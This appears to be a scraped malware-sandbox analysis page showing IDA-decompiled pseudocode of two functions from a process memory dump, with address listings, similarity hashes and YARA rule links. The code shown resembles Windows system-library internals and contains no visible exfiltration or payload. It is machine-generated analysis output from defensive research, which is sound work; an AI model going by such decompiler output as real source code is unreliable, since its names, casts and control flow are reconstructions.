0x04cb65f3
0x04cb65fd
0x04cb6604
0x04cb6606
0x04cb6612
0x04cb6612
0x04cb6619
0x04cb661d
0x04cb66bb
0x04cb66c5
0x04cb6623
0x04cb6623
0x04cb6624
0x04cb6624
0x04cb661d
0x04cb662a
0x04cb6634
0x04cb66d2
0x04cb66d8
0x04cb66de
0x04cb66de
0x04cb66d2
0x04cb6634
0x04cb662a
0x04cb663e
0x04cb6647
0x04cb664b
0x04cb664f
0x04cb6651
0x04cb6654
0x04cb666b
0x04cb66ea
0x04cb66ed
0x04cb66ed
0x04cb6676
0x04cb6680
0x04cb6680
0x04cb65b5
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c19ec42fef7559b30ca2bc7ff09188eb1e0df06c2dc54cd18429ac7ae6ae969
Instruction ID: edbe59b5e2290321d45dc2093310a8677c4189ee129017429bb13b21129bbb89
Opcode Fuzzy Hash: 5c19ec42fef7559b30ca2bc7ff09188eb1e0df06c2dc54cd18429ac7ae6ae969
Instruction Fuzzy Hash: 2BE16C71608341CFC714DF28C490AAABBE2FF89318F05896DE9D597351EB31EA45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04CA8347 Relevance: .4, Instructions: 380
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E04CA8347(intOrPtr* __ecx, signed short* __edx, intOrPtr _a4, signed short* _a8, signed short* _a12, intOrPtr _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr* _a28, intOrPtr* _a32, intOrPtr _a36, signed char _a40) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed short* _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr* _v36;
				signed int _t125;
				signed int _t126;
				signed int _t128;
				signed int _t129;
				signed int _t131;
				signed int _t132;
				void* _t133;
				intOrPtr* _t134;
				intOrPtr _t156;
				void* _t162;
				intOrPtr _t199;
				intOrPtr _t210;
				signed int _t212;
				void* _t214;
				signed short* _t219;
				void* _t231;
				signed int _t242;
				intOrPtr* _t259;
				void* _t266;
				short _t272;
				signed int _t275;
				void* _t276;
				signed short* _t277;
				intOrPtr _t282;
				intOrPtr* _t283;
				signed short* _t284;
				intOrPtr _t285;
				intOrPtr* _t286;

				_v24 = __edx;
				_v36 = __ecx;
				if((_a40 & 0xfffffffe) != 0) {
					L82:
					return 0xc000000d;
				}
				_v20 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				if(E04CA87BF(__edx) < 0) {
					goto L82;
				}
				_t285 = _a4;
				if(_t285 != 0) {
					_t125 = E04CA87BF(_t285);
				} else {
					_t125 = 0;
				}
				if(_t125 < 0) {
					goto L82;
				} else {
					_t219 = _a8;
					_v5 = 0;
					_v32 = 0;
					_t276 = 0x5c;
					if(_t219 == 0) {
						L11:
						_t277 = _a12;
						if(_t277 == 0) {
							_t126 = 0;
						} else {
							_t126 = E04CA87BF(_t277);
						}
						if(_t126 < 0) {
							goto L82;
						} else {
							_t127 = _a20;
							if(_a20 == 0) {
								_t128 = 0;
							} else {
								_t128 = E04CA87BF(_t127);
							}
							if(_t128 < 0) {
								goto L82;
							} else {
								_t220 = _a24;
								if(_a24 == 0) {
									_t129 = 0;
								} else {
									_t129 = E04CA87BF(_t220);
								}
								if(_t129 < 0) {
									goto L82;
								} else {
									_t130 = _a28;
									if(_a28 != 0) {
										_t131 = E04CA87BF(_t130);
									} else {
										_t131 = 0;
									}
									if(_t131 < 0) {
										goto L82;
									} else {
										_t259 = _a32;
										if(_t259 != 0) {
											_t132 = E04CA87BF(_t259);
										} else {
											_t132 = 0;
										}
										if(_t132 < 0) {
											goto L82;
										} else {
											_t210 = _a36;
											if(_t210 != 0) {
												_t133 = E04CA87BF(_t210);
											} else {
												_t133 = 0;
											}
											if(_t133 < 0) {
												goto L82;
											} else {
												if(_t277 == 0) {
													_t277 = _v24;
													_a12 = _t277;
												}
												if(_a20 == 0) {
													_a20 = 0x4c81010;
												}
												_t134 = _a24;
												if(_t134 == 0) {
													_t134 = 0x4c81010;
													_a24 = 0x4c81010;
												}
												if(_a28 == 0) {
													_a28 = 0x4c81010;
												}
												if(_t259 == 0) {
													_t259 = 0x4c81010;
													_a32 = 0x4c81010;
												}
												_t282 = (( *(_a20 + 2) & 0x0000ffff) + 0x00000003 & 0xfffffffc) + 0x4c8 + (( *(_t134 + 2) & 0x0000ffff) + 0x00000003 & 0xfffffffc) + (( *_v24 & 0x0000ffff) + 0x00000005 & 0xfffffffc) + (( *(_a28 + 2) & 0x0000ffff) + 0x00000003 & 0xfffffffc) + (( *_t277 & 0x0000ffff) + 0x00000005 & 0xfffffffc);
												_t231 = 0;
												if( *_t259 != 0) {
													_t282 = _t282 + (( *(_t259 + 2) & 0x0000ffff) + 0x00000003 & 0xfffffffc);
												}
												if(_t285 != 0) {
													_t282 = _t282 + (( *(_t285 + 2) & 0x0000ffff) + 0x00000003 & 0xfffffffc);
												}
												if(_t210 != 0) {
													_t282 = _t282 + (( *(_t210 + 2) & 0x0000ffff) + 0x00000003 & 0xfffffffc);
												}
												if(_a16 != _t231) {
													_t156 = E04CDBA17(_a16, 1);
													_t231 = 0;
												} else {
													_t156 =  *((intOrPtr*)(_v20 + 0x290));
												}
												_v16 = _t156;
												_t212 = _t156 + 0x00000003 & 0xfffffffc;
												if(_t212 < _t156) {
													L77:
													return 0xc0000095;
												} else {
													while(1) {
														_t158 = _t212 + _t282;
														if(_t212 + _t282 < _t282) {
															goto L77;
														}
														_t286 = E04CC5D90(_t231,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t231, _t158);
														if(_t286 == 0) {
															return 0xc000009a;
														}
														_t162 = _t282 + _t286;
														if(_a16 != 0) {
															E04CF88C0(_t162, _a16, _v16);
															L47:
															E04CF8F40(_t286, 0, 0x2c0);
															 *(_t286 + 0x290) = _t212;
															_t213 = _v20;
															 *((intOrPtr*)(_t286 + 0x48)) = _t282 + _t286;
															_t56 = _t286 + 0x2c0; // 0x2c0
															 *_t286 = _t282;
															_v12 = _t56;
															 *((intOrPtr*)(_t286 + 4)) = _t282;
															_t59 = _t286 + 0x24; // 0x24
															_t283 = _t59;
															 *((intOrPtr*)(_t286 + 8)) = 1;
															 *(_t286 + 0x14) =  *(_v20 + 0x14) & 1;
															_t170 = _a8;
															if(_a8 == 0) {
																E04CBFED0(0x4da5b40);
																E04CA8746( &_v12, _t283, _t213 + 0x24, 0x208);
																_push(0x4da5b40);
																E04CBE740( &_v12);
																L63:
																_t214 = 2;
																L50:
																_t236 = _a4;
																if(_a4 != 0) {
																	_t104 = _t286 + 0x30; // 0x30
																	E04CA8746( &_v12, _t104, _t236,  *(_t236 + 2) & 0x0000ffff);
																}
																_t238 = _a36;
																if(_a36 != 0) {
																	_t116 = _t286 + 0x2a4; // 0x2a4
																	E04CA8746( &_v12, _t116, _t238,  *(_t238 + 2) & 0x0000ffff);
																}
																_t73 = _t286 + 0x38; // 0x38
																E04CA8746( &_v12, _t73, _v24, ( *_v24 & 0x0000ffff) + _t214);
																_t284 = _a12;
																_t76 = _t286 + 0x40; // 0x40
																_t266 = _t76;
																_t242 =  *_t284 & 0x0000ffff;
																_t182 = _t284[1] & 0x0000ffff;
																if(_t242 != (_t284[1] & 0x0000ffff)) {
																	_t182 = _t214 + _t242;
																}
																E04CA8746( &_v12, _t266, _t284, _t182);
																_t81 = _t286 + 0x70; // 0x70
																E04CA8746( &_v12, _t81, _a20,  *(_a20 + 2) & 0x0000ffff);
																_t85 = _t286 + 0x78; // 0x78
																E04CA8746( &_v12, _t85, _a24,  *(_a24 + 2) & 0x0000ffff);
																_t89 = _t286 + 0x80; // 0x80
																E04CA8746( &_v12, _t89, _a28,  *(_a28 + 2) & 0x0000ffff);
																_t250 = _a32;
																if( *_a32 != 0) {
																	_t119 = _t286 + 0x88; // 0x88
																	E04CA8746( &_v12, _t119, _t250,  *(_t250 + 2) & 0x0000ffff);
																}
																if((_a40 & 0x00000001) == 0) {
																	_t286 = E04D35AE0(_t286);
																}
																 *_v36 = _t286;
																return 0;
															}
															E04CA8746( &_v12, _t283, _t170, 0x208);
															if(_v5 == 0) {
																goto L63;
															}
															_t272 = 0x5c;
															_t214 = 2;
															 *((short*)( *((intOrPtr*)(_t286 + 0x28)) + _v32 * 2)) = _t272;
															 *_t283 =  *_t283 + _t214;
															goto L50;
														}
														E04CBFED0(0x4da5b40);
														_t273 = _v20;
														_t199 =  *((intOrPtr*)(_v20 + 0x290));
														_v16 = _t199;
														_t255 = _t199 + 0x00000003 & 0xfffffffc;
														_v28 = _t199 + 0x00000003 & 0xfffffffc;
														if(_t199 > _t212) {
															_push(0x4da5b40);
															E04CBE740(_t255);
															E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t286);
															_t212 = _v28;
															_t231 = 0;
															if(_t212 >= _v16) {
																continue;
															}
															goto L77;
														}
														E04CF88C0(_t282 + _t286,  *((intOrPtr*)(_t273 + 0x48)), _t199);
														_push(0x4da5b40);
														E04CBE740(_t255);
														_t212 = _v28;
														goto L47;
													}
													goto L77;
												}
											}
										}
									}
								}
							}
						}
					}
					_t275 = ( *_t219 & 0x0000ffff) >> 1;
					_v32 = _t275;
					if(E04CA87BF(_t219) < 0 || _t275 == 0) {
						goto L82;
					} else {
						if( *((intOrPtr*)(_t219[2] + _t275 * 2 - 2)) == _t276) {
							goto L11;
						}
						if(_t275 > 0x103) {
							goto L82;
						}
						_v5 = 1;
						goto L11;
					}
				}
			}

0x04ca8359
0x04ca835c
0x04ca835f
0x04d0b435
0x00000000
0x04d0b435
0x04ca8370
0x04ca837a
0x00000000
0x00000000
0x04ca8380
0x04ca8387
0x04ca86c0
0x04ca838d
0x04ca838d
0x04ca838d
0x04ca8391
0x00000000
0x04ca8397
0x04ca8397
0x04ca839a
0x04ca839d
0x04ca83a2
0x04ca83a5
0x04ca83de
0x04ca83de
0x04ca83e3
0x04d0b33f
0x04ca83e9
0x04ca83eb
0x04ca83eb
0x04ca83f2
0x00000000
0x04ca83f8
0x04ca83f8
0x04ca83fd
0x04d0b346
0x04ca8403
0x04ca8405
0x04ca8405
0x04ca840c
0x00000000
0x04ca8412
0x04ca8412
0x04ca8417
0x04d0b34d
0x04ca841d
0x04ca841d
0x04ca841d
0x04ca8424
0x00000000
0x04ca842a
0x04ca842a
0x04ca842f
0x04d0b356
0x04ca8435
0x04ca8435
0x04ca8435
0x04ca8439
0x00000000
0x04ca843f
0x04ca843f
0x04ca8444
0x04d0b362
0x04ca844a
0x04ca844a
0x04ca844a
0x04ca844e
0x00000000
0x04ca8454
0x04ca8454
0x04ca8459
0x04d0b36e
0x04ca845f
0x04ca845f
0x04ca845f
0x04ca8463
0x00000000
0x04ca8469
0x04ca846b
0x04d0b378
0x04d0b37b
0x04d0b37b
0x04ca847a
0x04d0b383
0x04d0b383
0x04ca8480
0x04ca8485
0x04d0b38b
0x04d0b38d
0x04d0b38d
0x04ca848f
0x04ca8491
0x04ca8491
0x04ca8496
0x04ca8498
0x04ca849a
0x04ca849a
0x04ca84e2
0x04ca84e4
0x04ca84e9
0x04d0b39f
0x04d0b39f
0x04ca84f1
0x04ca86d4
0x04ca86d4
0x04ca84f9
0x04d0b3b0
0x04d0b3b0
0x04ca8502
0x04ca86e1
0x04ca86e6
0x04ca8508
0x04ca850b
0x04ca850b
0x04ca8514
0x04ca8517
0x04ca851c
0x04d0b3e2
0x00000000
0x04ca8522
0x04ca8522
0x04ca8522
0x04ca8527
0x00000000
0x00000000
0x04ca853d
0x04ca8541
0x00000000
0x04d0b42b
0x04ca854b
0x04ca854e
0x04ca86f4
0x04ca8598
0x04ca85a1
0x04ca85a9
0x04ca85af
0x04ca85b4
0x04ca85b8
0x04ca85be
0x04ca85c0
0x04ca85c6
0x04ca85c9
0x04ca85c9
0x04ca85cc
0x04ca85d4
0x04ca85d7
0x04ca85dc
0x04ca8706
0x04ca8719
0x04ca871e
0x04ca8723
0x04ca8728
0x04ca872a
0x04ca860f
0x04ca860f
0x04ca8614
0x04ca8734
0x04ca873c
0x04ca873c
0x04ca861a
0x04ca861f
0x04d0b3f0
0x04d0b3fb
0x04d0b3fb
0x04ca8628
0x04ca8635
0x04ca863a
0x04ca863d
0x04ca863d
0x04ca8640
0x04ca8643
0x04ca864a
0x04ca864c
0x04ca864c
0x04ca8654
0x04ca865c
0x04ca8668
0x04ca8670
0x04ca867c
0x04ca8684
0x04ca8693
0x04ca8698
0x04ca86a0
0x04d0b409
0x04d0b414
0x04d0b414
0x04ca86aa
0x04d0b424
0x04d0b424
0x04ca86b3
0x00000000
0x04ca86b5
0x04ca85ed
0x04ca85f6
0x00000000
0x00000000
0x04ca8604
0x04ca8607
0x04ca8608
0x04ca860c
0x00000000
0x04ca860c
0x04ca8559
0x04ca855e
0x04ca8561
0x04ca8567
0x04ca856d
0x04ca8570
0x04ca8575
0x04d0b3b7
0x04d0b3bc
0x04d0b3ce
0x04d0b3d3
0x04d0b3d8
0x04d0b3dc
0x00000000
0x00000000
0x00000000
0x04d0b3dc
0x04ca8583
0x04ca858b
0x04ca8590
0x04ca8595
0x00000000
0x04ca8595
0x00000000
0x04ca8522
0x04ca851c
0x04ca8463
0x04ca844e
0x04ca8439
0x04ca8424
0x04ca840c
0x04ca83f2
0x04ca83aa
0x04ca83ac
0x04ca83b6
0x00000000
0x04ca83c4
0x04ca83cc
0x00000000
0x00000000
0x04ca83d4
0x00000000
0x00000000
0x04ca83da
0x00000000
0x04ca83da
0x04ca83b6

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9f9cb1c4ccc7268ef640098c5f30016578555c4306d23f8e1ad73f738b8314a
Instruction ID: 7effe953e0063ee469cc22c76c4c11020870363a38825561861032162aef754e
Opcode Fuzzy Hash: b9f9cb1c4ccc7268ef640098c5f30016578555c4306d23f8e1ad73f738b8314a
Instruction Fuzzy Hash: B1D1D671A006069BDB14EF65C890BBA73B6BF4470CF18852AF916DB280E734FA55D760

Uniqueness

Uniqueness Score: -1.00%

Function 04CDEE48 Relevance: .3, Instructions: 347
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E04CDEE48(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t196;
				signed int _t201;
				signed int _t202;
				intOrPtr _t206;
				signed int _t207;
				intOrPtr _t209;
				intOrPtr _t215;
				signed int _t222;
				signed int _t227;
				signed int _t228;
				signed int _t231;
				signed int _t244;
				signed int _t247;
				char* _t250;
				intOrPtr _t255;
				signed int _t269;
				signed int* _t270;
				intOrPtr _t279;
				signed char _t284;
				signed int _t291;
				signed int _t292;
				intOrPtr _t301;
				intOrPtr* _t307;
				signed int _t308;
				signed int _t309;
				intOrPtr _t313;
				intOrPtr _t314;
				intOrPtr* _t316;
				void* _t318;

				_push(0x7c);
				_push(0x4d8c610);
				E04D07C40(__ebx, __edi, __esi);
				_t313 = __edx;
				 *((intOrPtr*)(_t318 - 0x48)) = __edx;
				 *((intOrPtr*)(_t318 - 0x20)) = __ecx;
				 *(_t318 - 0x58) = 0;
				 *((intOrPtr*)(_t318 - 0x74)) = 0;
				_t269 = 0;
				 *(_t318 - 0x64) = 0;
				 *((intOrPtr*)(_t318 - 0x70)) =  *((intOrPtr*)(__ecx + 0x2c)) + __ecx;
				_t196 = __edx + 0x28;
				 *((intOrPtr*)(_t318 - 0x78)) = _t196;
				 *((intOrPtr*)(_t318 - 0x84)) = _t196;
				L04CC2330(_t196, _t196);
				_t314 =  *((intOrPtr*)(_t313 + 0x2c));
				 *((intOrPtr*)(_t318 - 0x68)) = _t314;
				L1:
				while(1) {
					if(_t314 ==  *((intOrPtr*)(_t318 - 0x48)) + 0x2c) {
						E04CC24D0( *((intOrPtr*)(_t318 - 0x78)));
						asm("sbb ebx, ebx");
						 *[fs:0x0] =  *((intOrPtr*)(_t318 - 0x10));
						return  ~_t269 & 0xc000022d;
					}
					 *((intOrPtr*)(_t318 - 0x54)) = _t314 - 4;
					_t307 = 0x7ffe0010;
					_t270 = 0x7ffe03b0;
					goto L4;
					do {
						do {
							do {
								do {
									L4:
									_t201 =  *0x4da67f0; // 0x0
									 *(_t318 - 0x30) = _t201;
									_t202 =  *0x4da67f4; // 0x0
									 *(_t318 - 0x3c) = _t202;
									 *(_t318 - 0x28) =  *_t270;
									 *(_t318 - 0x5c) = _t270[1];
									while(1) {
										_t301 =  *0x7ffe000c;
										_t279 =  *0x7ffe0008;
										__eflags = _t301 -  *_t307;
										if(_t301 ==  *_t307) {
											goto L6;
										}
										asm("pause");
									}
									L6:
									_t270 = 0x7ffe03b0;
									_t308 =  *0x7ffe03b0;
									 *(_t318 - 0x38) = _t308;
									_t206 =  *0x7FFE03B4;
									 *((intOrPtr*)(_t318 - 0x34)) = _t206;
									__eflags =  *(_t318 - 0x28) - _t308;
									_t307 = 0x7ffe0010;
								} while ( *(_t318 - 0x28) != _t308);
								__eflags =  *(_t318 - 0x5c) - _t206;
							} while ( *(_t318 - 0x5c) != _t206);
							_t207 =  *0x4da67f0; // 0x0
							_t309 =  *0x4da67f4; // 0x0
							 *(_t318 - 0x28) = _t309;
							__eflags =  *(_t318 - 0x30) - _t207;
							_t307 = 0x7ffe0010;
						} while ( *(_t318 - 0x30) != _t207);
						__eflags =  *(_t318 - 0x3c) -  *(_t318 - 0x28);
					} while ( *(_t318 - 0x3c) !=  *(_t318 - 0x28));
					_t316 =  *((intOrPtr*)(_t318 - 0x68));
					_t269 =  *(_t318 - 0x64);
					asm("sbb edx, [ebp-0x34]");
					asm("sbb edx, eax");
					 *(_t318 - 0x28) = _t279 -  *(_t318 - 0x38) -  *(_t318 - 0x30) + 0x7a120;
					asm("adc edx, edi");
					asm("lock inc dword [esi+0x28]");
					_t209 =  *((intOrPtr*)(_t318 - 0x20));
					_t40 = _t209 + 0x18; // 0x2f1c548
					_t284 =  *(_t316 + 0x20) &  *_t40;
					 *(_t318 - 0x38) = _t284;
					__eflags =  *(_t316 + 0x30);
					if( *(_t316 + 0x30) != 0) {
						L37:
						_t314 =  *_t316;
						 *((intOrPtr*)(_t318 - 0x68)) = _t314;
						E04CDF24A(_t318 - 0x74, _t269,  *((intOrPtr*)(_t318 - 0x54)), _t318 - 0x58, 0, _t314, _t318 - 0x74);
						__eflags =  *(_t318 - 0x58);
						if( *(_t318 - 0x58) != 0) {
							 *0x4da91e0( *((intOrPtr*)(_t318 - 0x74)));
							 *(_t318 - 0x58)();
						}
						continue;
					}
					__eflags = _t284;
					if(_t284 == 0) {
						goto L37;
					}
					 *(_t318 - 0x60) = _t284;
					_t44 = _t318 - 0x60;
					 *_t44 =  *(_t318 - 0x60) & 0x00000001;
					__eflags =  *_t44;
					if( *_t44 == 0) {
						L40:
						__eflags = _t284 & 0xfffffffe;
						if((_t284 & 0xfffffffe) != 0) {
							__eflags =  *(_t316 + 0x60);
							if( *(_t316 + 0x60) == 0) {
								L14:
								__eflags =  *(_t316 + 0x3c);
								if( *(_t316 + 0x3c) != 0) {
									__eflags = _t301 -  *((intOrPtr*)(_t316 + 0x48));
									if(__eflags > 0) {
										goto L15;
									}
									if(__eflags < 0) {
										L59:
										_t146 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x2f230ac
										__eflags =  *((intOrPtr*)(_t316 + 0x58)) -  *_t146;
										if( *((intOrPtr*)(_t316 + 0x58)) >=  *_t146) {
											goto L37;
										}
										goto L15;
									}
									__eflags =  *(_t318 - 0x28) -  *((intOrPtr*)(_t316 + 0x44));
									if( *(_t318 - 0x28) >=  *((intOrPtr*)(_t316 + 0x44))) {
										goto L15;
									}
									goto L59;
								}
								L15:
								__eflags =  *(_t318 + 8);
								if( *(_t318 + 8) != 0) {
									__eflags =  *(_t316 + 0x54);
									if( *(_t316 + 0x54) != 0) {
										goto L16;
									}
									goto L37;
								}
								L16:
								 *(_t318 - 0x24) = 0;
								 *(_t318 - 0x30) = 0;
								 *((intOrPtr*)(_t318 - 0x2c)) =  *((intOrPtr*)(_t316 + 0xc));
								_t215 =  *((intOrPtr*)(_t316 + 8));
								 *((intOrPtr*)(_t318 - 0x44)) =  *((intOrPtr*)(_t215 + 0x10));
								 *((intOrPtr*)(_t318 - 0x40)) =  *((intOrPtr*)(_t215 + 0x14));
								 *(_t318 - 0x5c) =  *(_t215 + 0x24);
								 *((intOrPtr*)(_t318 - 0x34)) =  *((intOrPtr*)(_t316 + 0x10));
								 *((intOrPtr*)(_t318 - 0x6c)) =  *((intOrPtr*)(_t316 + 0x14));
								 *((intOrPtr*)(_t316 + 0x5c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
								_t222 =  *((intOrPtr*)(_t318 - 0x48)) + 0x28;
								 *(_t318 - 0x8c) = _t222;
								_t291 = _t222;
								 *(_t318 - 0x28) = _t291;
								 *(_t318 - 0x88) = _t291;
								E04CC24D0(_t222);
								_t292 = 0;
								 *(_t318 - 0x50) = 0;
								 *(_t318 - 0x4c) = 0;
								 *(_t318 - 0x3c) = 0;
								__eflags =  *(_t316 + 0x24);
								if(__eflags != 0) {
									asm("lock bts dword [eax], 0x0");
									_t227 = 0;
									_t228 = _t227 & 0xffffff00 | __eflags >= 0x00000000;
									 *(_t318 - 0x4c) = _t228;
									 *(_t318 - 0x3c) = _t228;
									__eflags = _t228;
									if(_t228 != 0) {
										goto L17;
									}
									__eflags =  *(_t318 + 8) - 1;
									if( *(_t318 + 8) == 1) {
										L04CC2330( *(_t316 + 0x24) + 0x10,  *(_t316 + 0x24) + 0x10);
										_t228 = 1;
										 *(_t318 - 0x4c) = 1;
										 *(_t318 - 0x3c) = 1;
										goto L17;
									}
									_t231 = _t228 + 1;
									L35:
									 *(_t316 + 0x54) = _t231;
									__eflags = _t292;
									if(_t292 == 0) {
										L04CC2330(_t231,  *(_t318 - 0x28));
									}
									 *((intOrPtr*)(_t316 + 0x5c)) = 0;
									goto L37;
								}
								L17:
								__eflags =  *(_t316 + 0x30);
								if( *(_t316 + 0x30) != 0) {
									L26:
									__eflags =  *(_t318 - 0x4c);
									if( *(_t318 - 0x4c) != 0) {
										_t228 = E04CC24D0( *(_t316 + 0x24) + 0x10);
									}
									__eflags =  *(_t318 - 0x30);
									if( *(_t318 - 0x30) == 0) {
										L71:
										_t292 =  *(_t318 - 0x50);
										L34:
										_t231 = 0;
										goto L35;
									}
									L04CC2330(_t228,  *(_t318 - 0x8c));
									_t292 = 1;
									 *(_t318 - 0x50) = 1;
									__eflags =  *(_t318 - 0x24) - 0xc000022d;
									if( *(_t318 - 0x24) == 0xc000022d) {
										L69:
										__eflags =  *(_t316 + 0x1c) & 0x00000004;
										if(( *(_t316 + 0x1c) & 0x00000004) == 0) {
											goto L34;
										}
										_t269 = 1;
										__eflags = 1;
										 *(_t318 - 0x64) = 1;
										_t187 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x2f230ac
										E04D3C726( *((intOrPtr*)(_t318 - 0x54)),  *(_t318 - 0x24),  *_t187);
										goto L71;
									}
									__eflags =  *(_t318 - 0x24) - 0xc0000017;
									if( *(_t318 - 0x24) == 0xc0000017) {
										goto L69;
									}
									__eflags =  *(_t316 + 0x18);
									if( *(_t316 + 0x18) != 0) {
										_t133 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x2f230ac
										__eflags =  *_t133 -  *(_t316 + 0x18);
										if( *_t133 -  *(_t316 + 0x18) > 0) {
											goto L31;
										}
										L32:
										__eflags =  *(_t316 + 0x1c) & 0x00000004;
										if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
											__eflags =  *(_t316 + 0x4c);
											if( *(_t316 + 0x4c) > 0) {
												 *(_t316 + 0x3c) = 0;
												 *((intOrPtr*)(_t316 + 0x50)) = 0;
												 *((intOrPtr*)(_t316 + 0x44)) = 0;
												 *((intOrPtr*)(_t316 + 0x48)) = 0;
												 *(_t316 + 0x4c) = 0;
												 *((intOrPtr*)(_t316 + 0x58)) = 0;
											}
										}
										goto L34;
									}
									L31:
									_t107 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x2f230ac
									 *(_t316 + 0x18) =  *_t107;
									goto L32;
								}
								 *(_t318 - 0x30) = 1;
								 *((intOrPtr*)(_t318 - 0x7c)) = 1;
								 *((intOrPtr*)(_t318 - 0x6c)) = E04CDF1F0( *((intOrPtr*)(_t318 - 0x6c)));
								 *((intOrPtr*)(_t318 - 4)) = 0;
								__eflags =  *(_t318 - 0x60);
								if( *(_t318 - 0x60) != 0) {
									_t255 =  *((intOrPtr*)(_t318 - 0x20));
									_t82 = _t255 + 0x14; // 0x2f1c548
									_t86 = _t255 + 0x10; // 0x2f230ac
									 *0x4da91e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *_t86,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)),  *((intOrPtr*)(_t318 - 0x70)),  *_t82);
									 *(_t318 - 0x24) =  *((intOrPtr*)(_t318 - 0x2c))();
								}
								_t244 =  *(_t318 - 0x38);
								__eflags = _t244 & 0x00000010;
								if((_t244 & 0x00000010) != 0) {
									__eflags =  *(_t316 + 0x30);
									if( *(_t316 + 0x30) != 0) {
										goto L21;
									}
									__eflags =  *(_t318 - 0x24);
									if( *(_t318 - 0x24) >= 0) {
										L64:
										 *0x4da91e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)), 0,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)), 0, 0);
										 *((intOrPtr*)(_t318 - 0x2c))();
										 *(_t318 - 0x24) = 0;
										_t244 =  *(_t318 - 0x38);
										goto L21;
									}
									__eflags =  *(_t316 + 0x1c) & 0x00000004;
									if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
										goto L21;
									}
									goto L64;
								} else {
									L21:
									__eflags = _t244 & 0xffffffee;
									if((_t244 & 0xffffffee) != 0) {
										 *(_t318 - 0x24) = 0;
										 *0x4da91e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *((intOrPtr*)(_t318 - 0x34)), _t244);
										 *((intOrPtr*)(_t318 - 0x2c))();
									}
									_t247 = E04CC3C40();
									__eflags = _t247;
									if(_t247 != 0) {
										_t250 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
									} else {
										_t250 = 0x7ffe038e;
									}
									__eflags =  *_t250;
									if( *_t250 != 0) {
										_t175 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x2f230ac
										_t250 = E04D3C490( *_t175,  *((intOrPtr*)(_t318 - 0x54)),  *((intOrPtr*)(_t318 - 0x48)),  *((intOrPtr*)(_t318 - 0x2c)),  *(_t318 - 0x38),  *(_t318 - 0x24),  *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)));
									}
									 *((intOrPtr*)(_t318 - 4)) = 0xfffffffe;
									E04CDF1DB(_t250);
									_t228 = E04CDF1F0( *((intOrPtr*)(_t318 - 0x6c)));
									goto L26;
								}
							}
						}
						__eflags = _t284 & 0x00000010;
						if((_t284 & 0x00000010) == 0) {
							goto L37;
						}
						goto L14;
					}
					__eflags =  *(_t316 + 0x18);
					if( *(_t316 + 0x18) != 0) {
						_t120 = _t209 + 0x10; // 0x2f230ac
						__eflags =  *_t120 -  *(_t316 + 0x18);
						if( *_t120 -  *(_t316 + 0x18) > 0) {
							goto L14;
						}
						goto L40;
					}
					goto L14;
				}
			}

0x04cdee48
0x04cdee4a
0x04cdee4f
0x04cdee54
0x04cdee56
0x04cdee5b
0x04cdee60
0x04cdee63
0x04cdee66
0x04cdee68
0x04cdee70
0x04cdee73
0x04cdee76
0x04cdee79
0x04cdee80
0x04cdee85
0x04cdee88
0x00000000
0x04cdee8b
0x04cdee93
0x04cdee98
0x04cdee9f
0x04cdeeac
0x04cdeeb8
0x04cdeeb8
0x04cdeebe
0x04cdeec6
0x04cdeec9
0x04cdeec9
0x04cdeece
0x04cdeece
0x04cdeece
0x04cdeece
0x04cdeece
0x04cdeece
0x04cdeed3
0x04cdeed6
0x04cdeedb
0x04cdeee0
0x04cdeee6
0x04cdeeee
0x04cdeeee
0x04cdeef0
0x04cdeef4
0x04cdeef6
0x00000000
0x00000000
0x04cdf1dc
0x04cdf1dc
0x04cdeefc
0x04cdeefc
0x04cdef01
0x04cdef03
0x04cdef06
0x04cdef09
0x04cdef0c
0x04cdef0f
0x04cdef0f
0x04cdef16
0x04cdef16
0x04cdef1b
0x04cdef20
0x04cdef26
0x04cdef29
0x04cdef2c
0x04cdef2c
0x04cdef36
0x04cdef36
0x04cdef3b
0x04cdef40
0x04cdef46
0x04cdef4c
0x04cdef54
0x04cdef57
0x04cdef59
0x04cdef60
0x04cdef63
0x04cdef63
0x04cdef66
0x04cdef69
0x04cdef6c
0x04cdf113
0x04cdf113
